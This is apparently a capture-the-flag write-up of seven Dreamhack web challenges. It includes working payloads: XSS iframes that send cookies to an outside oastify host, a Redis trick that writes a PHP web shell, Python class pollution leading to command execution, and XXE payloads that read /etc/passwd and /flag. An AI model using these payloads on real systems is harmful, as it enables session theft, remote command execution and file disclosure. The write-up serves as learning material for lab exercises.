# Dreamhack Web level 3
#### 1. XSS Filtering Bypass Advanced
Let's bypass XSS and extract cookie values using /memo.
In this situation, you can work around it by using browser normalization.
Normalization is the process of converting different URLs representing the same resource into a unified form. Special characters such as \x01, \x04, \tand are removed, and the case of the schema is unified.
I try to use iframe and %09 means \t
I use `` because () is blocked
```
<iframe src="javas%09cript:alert `1`"/>
```
Then i need to run this to get cookie:
`document.location='/memo?memo='+document.cookie;`
But code filter document and location. There are several ways to bypass this. I wonder can be use /t to bypass instead of %09
```
<iframe src="javas cript:d ocument.locatio n='/memo?memo='+d ocument.cookie;"/>
```
And it work
Another method is use Unicode and \t.
* d - \u0064
* o - \u006f
* n - \u006e
```
<iframe src="javascr ipt:\u0064ocument.locati\u006f\u006e.href = '/memo?memo=' + \u0064ocument.cookie;"/>
```
Another method i found, it send cookie to my burpsuite
```
<iframe src="javas cript:parent['docu'+'ment']['locatio'+'n']['hr'+'ef']=`http://c4hf8a80csryafhewqnio6i85zbqzjn8.oastify.com/?cookie=${parent['docu'+'ment']['cookie']}`">
```
#### 2. EZ_command_injection
You can notice here ('/ping', methods=['GET']), the host parameter is allowed in the ping directory
I try some ip like 8.8.8.8, 127.0.0.1 but can't ping
So let’s review the code, the variable `addr = ipaddress.ip_address(host)` when i search in [website](https://docs.python.org/3/library/ipaddress.html) document it support ipv6, but i try still not work
IPv6 addresses have a scope ID(%), which is an identifier used on the local network.
The link local addresses of all network cards in the world are on the same fe80::/16 network segment! , but they may not necessarily be able to ping each other. This is a big difference from IPv4.
All link-local addresses of IPv6 are in the same network segment, and IP routing alone is not enough to allow them to communicate with each other.
IPv6 addresses have strict scope restrictions. Two addresses must first be restricted within their own scopes, and then routing connectivity is considered.
I add a random ipv6 with %1 and command to execute
#### 3. youth-Case
When go to /shop i get block by nginx. In the file code app.js, i need to send post request to /shop and data is leg= some valude in ag.js
But not work, i read file nginx i need to bypass proxy.
After some reseach i find [this link](https://blog.bugport.net/exploiting-http-parsers-inconsistencies) have the same nginx config. The nginx version is 1.22.0 in NodeJS's express.
I can access to /shop but to get flag i need to bypass the leg=='flag'. If using FLAG the code uses toLowerCase() and result is flag. After some reseach i find [this link](https://dev.to/jagracey/hacking-github-s-auth-with-unicode-s-turkish-dotless-i-460n). After read website, the character such as Turkish İ by using the toLowerCase function, which becomes i, and can be used to bypass the character Unicode of other countries.
#### 4. insane python
Use {URL}/?body=value access in the form
After read the code, this is a ssti vulnerable.
If you analyze the app.py source code, you can see that the flag value is stored as SECRET in the CONFIG variable, and in the DataConfig class, it is used as an instance of a variable called config_data. In the path, the body parameter is received and passed to the value, and when passing it, if you look at the print_data function, you can see that it must be passed in the form of a config_data format string.
However, if it is {config_data.name}, the name of DataConfig is called.
I use __init__.__globals__ to get all global variable
#### 5. phpMyRedis
First, I looked into the characteristics of Redis.
* It is said that Lua scripts can be executed through the eval command in Redis.
* Redis stores memory data in the file system at regular intervals.
First off, there aren't any specific vulnerabilities in the code, and it seems we'll need to use the Redis system.
The config page allows you to view and change Redis settings, so let's use that page for now. I search [this page](https://secybr.com/posts/redis-pentesting-best-practices/) can explain what is Redis and the basic command
In /config, i type `dbfilename` and web return `dump.rdb`. This is the path to the file where the data will be saved.
When i type `save` web return value as above. Redis basically saves data periodically through save.
```
save <seconds> <changes>
```
Change the db file name to shell.php
I changed the save setting to 10 1 to force saving the data once every 10 seconds.
In /command input section, I created a web shell by inserting PHP code into Redis data. This ensured that the saved file would function as executable PHP code
```
return redis.call("set", "shell", "<? system($_GET['cmd']); ?>")
```
Execute command and get flag Access the generated shell.php and execute the command.
#### 6. Pybrid
In source code, user with role principal can execute cmd. If there is a cmd property in the command function, it is stored as is in the command variable, otherwise echo Permission Denied
User can execute the principal's command in the /execute path.
/add_member allows you to add members, and /members allows you to check the members' names and roles in JSON format.
There are 3 type of role to select in /add_member, so just catch reqquest and change role to principal.
When access to /execute website respone Permission Denied.
Looking at the source code again, you can see that when adding only the principal account in /add_member, the `merge` function dynamically adds properties to the principal object.
```
Example:
src = {"cmd": "ls", "extra": {"key": "value"}}
dst = Principal("Alice")
merge(src, dst)
Result:
dst.cmd == "ls"
dst.extra == {"key": "value"}
```
However, in /add_member if create a `new_member` by adding the cmd property usually requires adding it to the global `principal` object properties.
```
Dangerous attributes / methods (examples)
__dict__ — direct access/write to the instance’s attribute dictionary. (very powerful)
__class__ — gives the object’s class; from there an attacker can reach __mro__, __subclasses__, etc.
__mro__ — the method-resolution order (inheritance chain); can be used to discover system classes.
__subclasses__() — lists subclasses of a class (often used to find loaders/handlers/classes that can be abused).
__module__ — the module name where the object/class is defined.
__getattribute__, __getattr__, __setattr__, __delattr__ — intercept the mechanics of attribute access and assignment.
__call__ — makes an object callable like a function.
__init__, __new__ — overriding these can change initialization behavior.
__globals__ (on function objects) — gives access to the function’s global variables/modules (e.g., the os module).
__code__ (on function objects) — allows modification of the function’s code object (highly sensitive).
__closure__ — captures closure variables and related info.
__reduce__, __reduce_ex__, __getstate__, __setstate__ — related to pickling; can lead to RCE during deserialization.
__slots__ — affects attribute storage and can change object behavior.
__annotations__ — usually harmless, but can be abused as metadata.
__repr__, __str__ — overriding can cause crashes or information leakage during logging.
```
Therefore, to add a property to the principal global object by the merge function, so i use `__class__` can write attribute to class (Principal)
```
{
name: "test1",
role: "principal",
__class__: {
cmd: "id"
}
}
```
If you send the JSON above, `merge(data, new_member)` will be called. In Python, every instance has a `__class__` attribute. Therefore, when the merge loop encounters the key `__class__` with the value `{"cmd": "id"}`, the elif branch is taken and merge is called recursively. At that point, getattr(dst, k) returns the `__class__` attribute of dst; since dst is new_member and k is `__class__`, the Principal class is passed as the dst parameter. In other words, the recursive call becomes `merge({"cmd": "id"}, Principal)`. In that recursive call, when k is "cmd", v is "id", and dst is Principal, the setattr call sets the cmd attribute on the Principal class. Now, if you request /execute, `principal.command()` will use that class-level cmd value and you can get the id of host machine.
I try some command linux to get flag
#### 7. Movie time table
Flag was place in /flag
In Controller, web have 2 route is GET /table calls getMovies of movieService object with table.xml file as argument and POST /test calls getMovies with InputStream reflecting the user's input value
Exception will be thrown when the XML contains strings like `SYSTEM` and `file://`
This is the Model Movie
This is the structure table.xml
In the MoviesService.java file, the method only accepts InputStream and File as arguments. To prevent XXE Injection when processing an InputStream, the parser filters out the strings `SYSTEM` and `file://`.
If you send a POST request to the /test path, the Title and Showtimes sections below will be blank as in the response.
If you copy the entire XML content of the table.xml file in the source code, change the Content-Type below to application/xml, paste it, and make a request, you can see that the content is properly responded to and output in the Movie Schedule as before.
If you run the XXE test through DTD as shown below, you can see that `XXE TEST` is printed correctly in the showtimes section.
So i need to bypass the strings `SYSTEM` and `file://`.
After some reseacrh i find that `SYSTEM` and `PUBLIC` are almost synonym
Bypass file:// => file:/
```
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test PUBLIC 'FILE' 'file:/etc/passwd'>]>
<movies>
<movie>
<title>Parasite</title>
<showtimes>
<showtime>&test;</showtime>
</showtimes>
</movie>
</movies>
```
Another method is encode the charactor to hex and combine with DTD-based XXE (parameter entity `test1` → external general entity `test2`)
```
<?xml version="1.0"?><!DOCTYPE root [
<!ENTITY % test1 "<!ENTITY test2 SYSTEM 'file:///flag'>">
%test1;
]>
<movies>
<movie>
<title>Parasite</title>
<showtimes>
<showtime>&test2;</showtime>
</showtimes>
</movie>
</movies>
```
Sign in with Wallet
Connect another wallet